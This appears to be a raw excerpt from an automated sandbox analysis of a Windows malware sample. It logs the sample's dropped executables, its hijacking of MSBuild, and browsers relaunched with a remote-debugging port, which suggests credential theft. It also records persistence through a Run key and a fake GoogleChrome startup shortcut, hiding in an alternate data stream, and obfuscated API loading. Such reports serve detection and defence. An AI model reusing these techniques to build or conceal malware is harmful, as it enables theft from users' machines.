Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\ph4eu37qie.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\ProgramData\zmgdjecba1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\ProgramData\xlng4w479r.exe Process created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe 0
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Process created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe 8788
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,1823826932740669469,7503870437745622031,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2440 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2348,i,1823826932740669469,7503870437745622031,262144 --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=5348 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 11
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\v7942.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\v7942.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\ProgramData\ph4eu37qie.exe Section loaded: apphelp.dll
Source: C:\ProgramData\ph4eu37qie.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\ProgramData\zmgdjecba1.exe Section loaded: apphelp.dll
Source: C:\ProgramData\zmgdjecba1.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\xlng4w479r.exe Section loaded: apphelp.dll
Source: C:\ProgramData\xlng4w479r.exe Section loaded: wininet.dll
Source: C:\ProgramData\xlng4w479r.exe Section loaded: cryptbase.dll
Source: C:\ProgramData\xlng4w479r.exe Section loaded: ntmarta.dll
Source: C:\ProgramData\xlng4w479r.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: GoogleChrome.lnk.34.dr LNK file: ..\..\..\..\..\..\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: v7942.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: v7942.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: v7942.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: v7942.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: v7942.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: v7942.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: v7942.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: v7942.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004108E0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004513DA push edx; retf 29_2_004513FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004554C9 push 00000000h; iretd 29_2_00455520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_0044F5B2 push ds; ret 29_2_0044F5B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00451648 pushad ; retf 29_2_00451689
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00455676 push 00000000h; iretd 29_2_004556EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_00455766 push 00000000h; ret 29_2_00455770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 29_2_004517FC push ebx; ret 29_2_00451803
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EDC329 pushfd ; retf 0004h 32_2_61EDC32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 32_2_61EDA2A8 push ds; retf 32_2_61EDA2AE
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sss81242[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\s9471[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\xlng4w479r.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\zmgdjecba1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\ph4eu37qie.exe Jump to dropped file
Source: C:\ProgramData\xlng4w479r.exe File created: :cat (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe File created: C:\Users\user\AppData\Local\Temp\4mfMnLLX\EJNNjjms8tHlPaG5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe File created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\4TzoHWrzkq4Uuk1w.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\l9543[1].exe Jump to dropped file
Source: C:\ProgramData\xlng4w479r.exe File created: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\xlng4w479r.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\zmgdjecba1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\ph4eu37qie.exe Jump to dropped file

Boot Survival
barindex
Monitors registry run keys for changes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GoogleChrome.lnk
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GoogleChrome
Source: C:\Users\user\AppData\Local\Temp\0Ru0udcQ\eKQjcS7RNcSarFuG.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GoogleChrome

Hooking and other Techniques for Hiding and Protection
barindex
Creates / moves files in alternative data streams (ADS)
Source: C:\ProgramData\xlng4w479r.exe File moved: From: C:\ProgramData\xlng4w479r.exe to: :cat
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004108E0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004108E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
